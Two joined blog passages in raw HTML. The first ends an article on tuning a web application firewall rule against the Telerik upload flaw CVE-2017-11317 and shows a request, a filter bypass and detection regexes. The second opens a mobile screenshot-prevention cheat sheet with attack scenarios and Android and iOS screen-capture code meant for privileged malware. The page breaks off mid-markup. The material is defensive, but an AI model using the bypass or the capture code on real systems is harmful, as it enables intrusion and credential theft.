border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="metadata"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"test_12421498329494.txt"}</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f--</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><p cid="n109" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n110" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Response:</span></p><pre cid="n111" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" 
style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #229922;">200</span> OK</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Cache-Control:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> private</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> text/html; charset=utf-8</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Date:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Tue, 19 May 2020 14:26:16 GMT</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 666</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 
0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":18,"DateJson":"2019-01-02T03:04:05.067Z","Index":0},"metaData":"[Base64 Metadata]" }</span></pre><p cid="n112" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n113" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Finally, the regular expression was changed to prevent also this last bypass:</span></p><pre cid="n114" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: 
relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">.*name=.*raupostdata.*</span></pre><p cid="n115" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">With this rule, no matter how many characters are inserted between the strings, the request will still be blocked.</span></p><p cid="n116" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><h4 cid="n117" class="md-end-block md-heading" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Conclusions</span></h4><p cid="n118" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">This article has shown the process used to tune the web application firewall rule while studying the exploit of the Telerik Unrestricted File Upload 
(</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11317" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2017-11317</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) vulnerability. </span></p><p cid="n118" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">It demonstrates how a vulnerability that appears trivial to fix still requires careful analysis to develop an effective WAF rule.</span></p><p cid="n119" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The sequence of failed rule attempts underlines the importance of the following factors when developing a WAF rule:</span></p><ul cid="n120" class="ul-list" data-mark="-" mdtype="list" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin: 0.8em 0px; padding-left: 30px; position: relative;"><li cid="n121" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n122" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; 
margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Avoid the implementation of coarse rules that impair the usability of an asset</span></p></li><li cid="n123" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n124" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Always perform normalization and lower case transformation of the textual parameters to check</span></p></li><li cid="n125" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n126" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Be suspicious of very strict regular expressions</span></p></li></ul><p cid="n127" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Obviously, all the recommendations above can be reversed for a penetration tester. 
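As an added example that is not part of the original article, the following Python script models the "RegEx Woes" of the 5th rule and the recommendation about strict regular expressions: it applies the weak `.?.?` pattern and the hardened pattern from the article to a constructed multipart body in its regular form and in the spaces-instead-of-quotes form, and shows how a whitespace-tolerant multipart parser still recovers the part name. Only the boundary string comes from the article's captured request; the bodies and the tolerant parser are constructed assumptions, not Telerik's code.

```python
import re
from urllib.parse import unquote

# The two body rules from the article, applied to the normalized, lower-cased body.
# re.DOTALL lets the leading/trailing ".*" span the several lines of a multipart body.
WEAK_RULE = re.compile(r".*name=.?.?raupostdata.*", re.DOTALL)    # at most 2 chars after "name="
HARDENED_RULE = re.compile(r".*name=.*raupostdata.*", re.DOTALL)  # any number of chars

# Boundary taken from the article's captured request; the bodies below are constructed.
BOUNDARY = "---------------------------62616f37756f2f"


def normalize(body: bytes) -> str:
    """Mimic the WAF pre-processing described in the article: URL-decode and lower-case."""
    return unquote(body.decode("utf-8", errors="replace")).lower()


def rule_blocks(body: bytes, rule: re.Pattern) -> bool:
    """True when the rule matches the normalized body, i.e. the WAF would block the request."""
    return rule.search(normalize(body)) is not None


def multipart(parts) -> bytes:
    """Build a multipart/form-data body from (Content-Disposition params, value) pairs."""
    chunks = [
        f"--{BOUNDARY}\r\nContent-Disposition: form-data; {disposition}\r\n\r\n{value}\r\n"
        for disposition, value in parts
    ]
    chunks.append(f"--{BOUNDARY}--\r\n")
    return "".join(chunks).encode("utf-8")


# Regular syntax: the part name is quoted, as a browser would send it (constructed body).
REGULAR_BODY = multipart([
    ('name="rauPostData"', "[encrypted rauPostData payload]"),
    ('name="type"', "rau"),
])

# The form from the article's bypass: quotes removed, three spaces after "name=" (constructed).
BYPASS_BODY = multipart([
    ("name=   rauPostData", "[encrypted rauPostData payload]"),
    ('name="type"', "rau"),
])

# Hypothetical model of a tolerant server-side parser (an assumption about the behaviour
# the article reports, not Telerik's code): surrounding whitespace and missing quotes
# around the part name are accepted.
_NAME_PARAM = re.compile(r'name=\s*"?([^";\r\n]+?)"?\s*(?:;|$)')


def lenient_part_names(body: bytes) -> list:
    """Part names as a whitespace/quote-tolerant multipart parser would see them."""
    names = []
    for line in body.decode("utf-8", errors="replace").splitlines():
        if line.lower().startswith("content-disposition:"):
            match = _NAME_PARAM.search(line)
            if match:
                names.append(match.group(1).strip())
    return names


def evaluate(body: bytes) -> dict:
    """Compare what each WAF rule decides with what the server would accept."""
    names = [name.lower() for name in lenient_part_names(body)]
    return {
        "weak_rule_blocks": rule_blocks(body, WEAK_RULE),
        "hardened_rule_blocks": rule_blocks(body, HARDENED_RULE),
        "server_sees_raupostdata": "raupostdata" in names,
    }


if __name__ == "__main__":
    # The bypass body shows the gap: the weak rule lets it through while the server
    # still recognises the rauPostData part; the hardened rule closes that gap.
    for label, body in (("regular", REGULAR_BODY), ("bypass", BYPASS_BODY)):
        print(label, evaluate(body))
```

Note that the hardened pattern also matches any body in which "raupostdata" appears anywhere after a "name=", for instance inside an uploaded text file, so its false-positive rate should be checked against legitimate traffic before deployment.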
</span></p><p cid="n127" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b>Bottom line?</b> Always look for a bypass!</span></p><p cid="n128" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><h4 cid="n129" class="md-end-block md-heading" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">References</span></h4><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"></span></p><ul cid="n130" class="ul-list" data-mark="-" mdtype="list" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin: 0.8em 0px 0px; padding-left: 30px; position: relative;"><li cid="n131" class="md-list-item" mdtype="list_item" style="box-sizing: 
border-box; margin: 0px; position: relative;"><p cid="n132" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-link md-pair-s" md-inline="url" spellcheck="false" style="box-sizing: border-box; word-break: break-all;"><a href="https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;">https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html</a></span></p></li><li cid="n133" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n134" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-link md-pair-s" md-inline="url" spellcheck="false" style="box-sizing: border-box; word-break: break-all;"><a href="https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;">https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui</a></span></p></li><li cid="n135" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n136" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-link md-pair-s" md-inline="url" spellcheck="false" style="box-sizing: border-box; word-break: break-all;"><a href="https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: 
pointer;">https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload</a></span></p></li><li cid="n137" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n138" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-link md-pair-s" md-inline="url" spellcheck="false" style="box-sizing: border-box; word-break: break-all;"><a href="https://github.com/noperator/CVE-2019-18935" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;">https://github.com/noperator/CVE-2019-18935</a></span></p></li><li cid="n139" class="md-list-item md-focus-container" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n140" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-link md-pair-s md-expand" md-inline="url" spellcheck="false" style="box-sizing: border-box; word-break: break-all;"><a href="https://github.com/bao7uo/RAU_crypto" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;">https://github.com/bao7uo/RAU_crypto</a></span></p></li></ul><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><br /></p></div></span></div></span></div>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-76561285386214730262020-10-15T09:53:00.014-07:002020-10-16T06:58:39.761-07:00Mobile Screenshot prevention Cheat Sheet - Risks 
and Scenarios<div><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><h1 style="line-height: 1.38; margin-bottom: 3pt; margin-top: 0pt; text-align: left;">Mobile Screenshot Prevention Cheat Sheet - Risks and Scenarios</h1><div>The following article analyzes and explains the risks and attack scenarios affecting mobile applications that do not implement any prevention mechanism against screenshotting.</div><div><br /></div><h2 style="text-align: left;">Briefly, what is the problem?</h2><div><div>In short, mobile applications need to implement screenshot prevention mechanisms in order to stop an attacker from stealing sensitive data, such as credentials or private information, that is shown on the screen while the application is running.</div><div><br /></div><div>The attacker could act by directly accessing the victim’s device, generating a screenshot using the device-specific key combination and then sending the generated screenshot to himself over the network. This kind of attack does not need any specific privilege or compromised device capability in order to be carried out: just physical access to the device.</div><div><br /></div><div>On the other hand, the attacker could act through malware delivered to the victim’s device in some way, such as an untrusted application downloaded from an unofficial store or sent directly to the victim. 
As soon as the victim’s device is infected, the attacker is able to access private data and, depending on the privileges obtainable on the infected device, to generate screenshots and/or access system-generated screenshots which are stored on the device and may contain useful information for carrying out further attacks.</div></div><div><br /></div><div><h2 style="text-align: left;">Attack Scenarios</h2><div>The following three attack scenarios can be used by an attacker in order to successfully exploit the vulnerability, depending on which access level is achievable on the targeted device:</div><div><br /></div></div></span></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div><span><div><div><b>- The attacker has physical access to the targeted device</b>: let’s assume the victim left his device unlocked on his desk with a running application which is showing sensitive information. In this scenario it would be possible for an attacker to generate a screenshot using the device-specific key combination and send it to his own device through the network. </div></div></span></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div><span><div><div> </div></div></span></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div><span><div><div><b>- The attacker has planted a background running malware on the targeted device</b>: let’s assume that the attacker has delivered a malicious application to the victim’s device, by uploading a compromised application to the store or by getting the victim to download an application from an untrusted source, and that the target device is in a compromised state that allows the malware privileged access to system calls. 
In this scenario the attacker would be able to silently generate device screenshots that can then be sent to the attacker himself through the network, exfiltrating sensitive data. </div></div></span></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div><span><div><div> </div></div></span></div></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><div><span><div><div><b>- The attacker has planted a foreground running malware on the targeted device</b>: let’s assume that the attacker has delivered a malicious application to the victim’s device, by uploading a compromised application to the store or by getting the victim to download an application from an untrusted source, and that the target device is in a modified state that allows the attacker to read files outside of the application sandbox. In this scenario the attacker would be able to access system-generated screenshots that may contain sensitive information and then exfiltrate these files through the network.</div></div></span></div></blockquote><p> </p><div><span><div><div><h2 style="text-align: left;">Risks</h2></div></div><div>The main risk related to this kind of vulnerability is the theft of sensitive information.</div><div>Any information shown on the device display can be stolen if not explicitly protected.</div><div><br /></div><div>So if an application displays private information in any of its views, that view must be protected.</div><div><br /></div><div><div>An attacker can use automated OCR (Optical Character Recognition) analyzers in order to automatically process the gathered screenshots and extract any information contained therein.</div><div><br /></div><div>Any extracted information can then be exfiltrated to an attacker controlled target in several possible ways, which are not covered by this article.</div><div><br /></div><div><br /></div><div>The following list is just an 
example of which kinds of data can be stolen:</div></div><div><br /></div></span></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><span><ul style="text-align: left;"><li><span><div><div><b>Passwords</b></div></div></span></li><li><span><div><div><b>PII</b> (Personally Identifiable Information)</div></div></span></li><li><span><div><b>PHI</b> (Personal Healthcare Information)</div></span></li><li><span><div><b>Private data </b>such as appointments, notes, etc.</div></span></li><li><span><div><b>Contacts</b></div></span></li><li><span><div><b>Email and message contents</b></div></span></li><li><span><div>[...]<br /></div></span></li></ul></span></blockquote><div><span><div><br /></div><div><h2 style="text-align: left;">Real world: a concrete attack</h2></div><div>As already stated, there are two kinds of approaches an attacker can use, based on how the victim’s device is accessed. Both of them are explained in the following paragraphs.</div><div><br /></div><div>In both scenarios, we will assume that Bill, the victim, is using the <i>SuperSecureMail</i> application. Bill resets his password, and the <i>SuperSecureMail</i> application generates a set of temporary credentials, showing them on the screen so that Bill can copy them and regain access to his mail account.</div><div><br /></div><h4 style="text-align: left;">Scenario 1: The attacker has physical access to the victim’s device</h4><div>Bill is in his office, and he has just generated temporary credentials in his <i>SuperSecureMail</i> application. Now, since the application has generated a complex and strong password, Bill wants to write it on a piece of paper in order to later log in to his mailbox, but unfortunately he has run out of paper, so he decides to go to the office next door to borrow some. 
In doing so, Bill leaves his mobile device unlocked on his desk.</div><div><div><br /></div><div>At this point the attacker can pick up Bill’s device and see the credentials on the screen. He has little time before Bill’s return, so he decides to take a screenshot of what is on the screen using the key combination specific to that device, and then sends himself the generated screenshot over a Bluetooth connection.</div><div><br /></div><div>Since the application was <u><b>not implementing any screenshotting countermeasure</b>,</u> the attacker now has a screenshot containing Bill’s credentials on his device and can use the obtained information to access Bill’s mailbox and/or perform further attacks.</div></div><div><br /></div><h4 style="text-align: left;">Scenario 2: The attacker has access to the victim’s device through malware</h4><div><div>This scenario is a bit more complex than the previous one, since the attacker needs to plant malware on Bill’s device before starting the attack; moreover, Bill’s device is running a mobile operating system which implements a permissive access control policy and allows processes to perform privileged operations (e.g. the device is rooted or jailbroken).</div><div><br /></div><div>There are many ways an attacker could trick Bill into installing attacker controlled malware. In this case the attacker knows that Bill loves to play mobile games full of cute kittens.</div><div>Using this information, the attacker creates a real mobile game with the desired look, but also inserts malicious pieces of code into the application. These pieces of code are designed to retrieve system-generated screenshots of any mobile application installed on Bill’s device. </div><div><br /></div><div>After generating this mobile game, the attacker sends an email to Bill saying “<i>Hey Bill, attached there is a mobile game that we think you would love! 
It is a preview and we care about your opinion, so it is free at this time but it is only for you</i>!”.</div><div><br /></div><div>Bill loves cute kittens. </div><div><br /></div><div>Bill installs the game and is unknowingly infected by the attacker’s malware.</div><div><br /></div><div>At this point, as in the previous scenario, Bill has just generated temporary credentials in his <i>SuperSecureMail</i> application. Now, since the application has generated a complex and strong password, Bill copies this password into the Notes application of his device.</div><div><br /></div><div>Now, when Bill switches between the <i>SuperSecureMail</i> application and the Notes application, while the <i>SuperSecureMail</i> application is being sent to the background the mobile operating system generates a screenshot of what the application is displaying at that moment. </div><div>The screenshot is a standard image that is shown in the device’s task manager and stored in a specific path on the device’s file system, which varies based on the operating system version.</div><div><br /></div><div>Finally, the malware can scan the file system searching for operating system generated screenshots. When it finds them, it can exfiltrate these images to an attacker controlled domain, where the data can be processed and the sensitive information contained therein extracted.</div><div><br /></div><div>It must be noted that the aforementioned scenarios are <i><u>only two</u></i> of the many kinds of attack an attacker may use to exploit this kind of vulnerability. However, they are two really common scenarios that can happen in the real world.</div></div><div><br /></div><h2 style="text-align: left;">How to do this? 
Let's see the code!</h2><div>The following code sample [1] shows how a screenshot can be generated from an <b>Android</b> background service using superuser privileges:</div><div><br /></div><div><div><span style="font-family: courier;"></span></div></div><blockquote><div><div><span style="background-color: #f3f3f3; font-family: courier;">Process sh = Runtime.getRuntime().exec("su", null, null); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">OutputStream os = sh.getOutputStream(); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">os.write(("/system/bin/screencap -p " + "/sdcard/img.png").getBytes("ASCII")); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">os.flush(); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">os.close(); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">sh.waitFor();</span></div><div><span style="background-color: #f3f3f3; font-family: courier;"><br /></span></div><div><span style="background-color: #f3f3f3; font-family: courier;">Bitmap screen = BitmapFactory.decodeFile(Environment.getExternalStorageDirectory()+ File.separator +"img.png");</span></div><div><span style="background-color: #f3f3f3; font-family: courier;">ByteArrayOutputStream bytes = new ByteArrayOutputStream(); screen.compress(Bitmap.CompressFormat.JPEG, 15, bytes); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">File f = new File(Environment.getExternalStorageDirectory()+ File.separator + "test.jpg"); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">f.createNewFile(); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">FileOutputStream fo = new FileOutputStream(f); fo.write(bytes.toByteArray());</span></div><div><span style="background-color: #f3f3f3; font-family: courier;">
fo.close();</span></div></div><div></div></blockquote><div><br /></div><div>In a similar way the following example of <b>iOS</b> code [2] can be used in a Mobile Substrate module, running in a jailbroken device, to generate a screenshot of any application:</div><div><br /></div><div><div><span style="background-color: #f3f3f3;"><span style="font-family: courier;"></span></span></div><blockquote><div><span style="background-color: #f3f3f3; font-family: courier;">UIKIT_EXTERN CGImageRef UIGetScreenImage();</span></div><div><span style="background-color: #f3f3f3; font-family: courier;">CGImageRef ref = UIGetScreenImage(); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">UIImage* img = [UIImage imageWithCGImage:ref];</span></div><div><span style="background-color: #f3f3f3; font-family: courier;">CGImageRelease(ref);</span></div></blockquote><div><span style="background-color: #eeeeee;"><span style="font-family: courier;"></span></span></div></div><div><br /></div><div><br /></div><div><div>The following library developed by Google can be used to generate screenshots from an <b>Android background service</b> without having access to superuser’s privileges:</div><div><ul style="text-align: left;"><li><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><div><div>https://code.google.com/archive/p/android-screenshot-library/</div></div></span></li></ul></div></div><div><div>In a similar way, if the attacker is targeting <b>Android versions 21+,</b> the following native framework can be used in order to achieve the same result, getting a screenshot generated on a standard device:</div><div><ul style="text-align: left;"><li><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><div><div>https://developer.android.com/reference/android/media/projection/MediaProjection</div></div></span></li></ul></div></div><h4 style="text-align: left;">Example - 1: accessing system generated screenshots</h4><div>In this paragraph is 
shown how an attacker can access system generated screenshots for the Safari application.</div><div>For this example, the Safari application has been opened and then it has been put on the background. This action resulted in the following image being shown in the <i>iOS</i> task manager:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUKHbNLNJTtDHpqZyNn0NmGWhTIJX6JCxe6Zvz0eo5d7Y2uDRl1GWd_WpHJk0cAb2N8ITrNJ8vuv28FOxo0Ms7bTVSsYOO8wmW4yQ-IFCSk8PXsAOq-KrS-s4W-EoNpi1u4NzuBG9m72k/s1334/IMG_0036.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1334" data-original-width="750" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUKHbNLNJTtDHpqZyNn0NmGWhTIJX6JCxe6Zvz0eo5d7Y2uDRl1GWd_WpHJk0cAb2N8ITrNJ8vuv28FOxo0Ms7bTVSsYOO8wmW4yQ-IFCSk8PXsAOq-KrS-s4W-EoNpi1u4NzuBG9m72k/s320/IMG_0036.PNG" /></a></div><br /><div><br /></div><div>System generated screenshots are located at the following location on <b>iOS 12:</b></div><div><span style="font-family: courier;"><blockquote style="background-color: #f3f3f3;"><blockquote>/var/mobile/Containers/Data/Application/{APPLICATION_BUNDLE_ID}/Library/Caches/Snapshots/{APPLICATION_PACKAGE_NAME}</blockquote></blockquote></span></div><div><br /></div><div><div>For example, in this case, Safari system generated screenshots are located at the following location:</div><div><span style="font-family: courier;"><blockquote style="background-color: 